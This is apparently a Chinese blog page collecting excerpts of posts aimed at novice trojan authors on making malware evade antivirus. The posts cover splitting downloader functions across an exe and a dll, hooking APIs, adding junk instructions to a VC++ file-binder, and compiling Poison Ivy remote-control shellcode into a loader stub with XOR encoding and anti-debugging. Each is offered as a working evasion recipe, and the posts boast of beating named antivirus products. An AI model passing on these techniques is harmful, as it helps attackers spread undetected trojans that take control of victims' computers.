欧阳逍遥愚人博客

关于vc源码免杀的一些小小思路

对于一个初级木马作者来说,最头痛就是关于木马免杀的时间问题.     首先抛开主动防御不说,就说源码的一些敏感函数.杀软可能逮着就把你kill掉了.根据自己长期总结.发觉杀软是采用记分制来判断你是不是病毒或者木马的.比如"URLDownloadToFile"是一个比较敏感的函数.可能大部分杀软一见到它就报警了.或者说一个木马有十分的话,就先给它记上4分.如果再次遇到"ShellFcuntion"的话,杀软就给你判定你这是一个下载者了,它就那么轻松.我们就用这两个函数,不想用其他方法的话就得想想办法了...把两个函数分开,不要放在一个文件里面.弄成一个exe跟一个dll, URLDownloadToFile运行完了之后再调用dll,dll里面的功能就只是执行一下下载下来的文件就OK了,当然.这样子做只是降低了一些风险.还远远不够达到免杀的目的.     再接着下一步,把两个函数的api地址都hook出来,hook函数的方法有很多,我就贴一个我自己比较常用的方法出来吧. HMODULE hMod = 0; hMod = LoadLibrary("URLMON.DLL");     ...

VC++源码免杀过金、卡、瑞等多款杀毒软件

金山、瑞星、卡巴(没有被启发的情况下)这些杀软.. 加点花指令应该可以了,步骤如下: 在Bind2FileDlg.cpp文件里面的 #include "stdafx.h" #include "Bind2File.h" #include "Bind2FileDlg.h" #include "FileTools.h" #ifdef _DEBUG #define new DEBUG_NEW #undef THIS_FILE static char THIS_FILE[] = __FILE__; #endif 后面加上了一句:void JunkCode() { __asm { nop nop nop nop nop }//这个就是在vc源码里面的花指令,我想看过红客学习基地编译教程的都应该知道, } 因为在vc里面加花指令不能像delphi,这样很容易导致vc卡死掉!下面的步骤就是在一些敏感的地方加void JunkCode();//花指令 这里注意的是花指令不要加到外面去了,感觉到差不多了,重新编译,然后金山杀一下,还是杀!用瑞星测试,呵呵...

编译PI远控SHELLCODE（VC++）加异或免杀~

来自暗组，但原贴有诸多语法错误，以下是修正后的编译法。 一，直接编译： #include <windows.h> #pragma comment(linker, "/OPT:NOWIN98") #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) #pragma comment(linker, "/MERGE:.rdata=.text") //合并区段，减小体积，可以不要 void main() { unsigned char PIShellCode[n] = {     //这里填上生成的数组 }; _asm { lea eax,_black    call eax } } 这么编译出来，国内全过了（表面），NOD32都不杀了~~只有360杀毒还没过。加个反调试，也过了。 如果自定义入口点的话，NOD32就杀了，很奇怪。。。 ==============================================...

Poison Ivy 的shellcode变异方法

什么是ShellCode，如果对ShellCode这个名词还很陌生的话，没关系，我简单解释一下，ShellCode实质上就是一段代码（其中可能会有填充数据），其用来发送到服务器利用特定的漏洞以获取控制权，获取了控制权之后，就可以为所欲为了.这里就教出入黑道的朋友自己动手编译ShellCode，需要用到的工具是Microsoft Visual C++ 6.0，这个可以到网上自己去下载。 首先打开VC++ 6.0，点击文件菜单，选择新建，切换到文件标签。在左边的框选择C++ Source File,文件名处填写上文件名，这里我命名为exp.c，注意，这里扩展名是.c而不是.cpp，因为C++比C语言检查更严格，如果以.cpp编译可能会出错的，然后点确定。 我们这里以这个代码为例子http://bbs.77169.com/htm_data/100/0611/173703.html 把C语言的代码粘贴进去，然后分别点击连接，编译，运行，如果代码没有问题，这样就能编译成功了。你也可以对代码进行小小的diy，写上你的网址或者名字，但是不推荐这样，毕竟这个代码不是我们自己写的，保留作者...

Poison Ivy 2.3 免杀说明.ShellCode免杀

PI的免杀无非就是三种， 1.混淆代码的（加花指令，垃圾代码，空函数，反调试代码）。 2.shellcode上下功夫（Shellcode加密）。 3.编译后续处理（一般是加壳，然后改壳）。 由于PI可以直接生成ShellCode 然后ShellCode免杀非常容易 例如使用TB 1.0c引擎可以直接进行ShellCode变形 Poly Engine引擎很多ShellCode本身就可以直接变形使用然后就是最简单的 __asm { lea eax, ShellCode call eax } asm lea eax, ShellCode call eax end; 关于Poly Engine可以从VX或者madchat找到 PI免杀非常容易的。。。嘿嘿～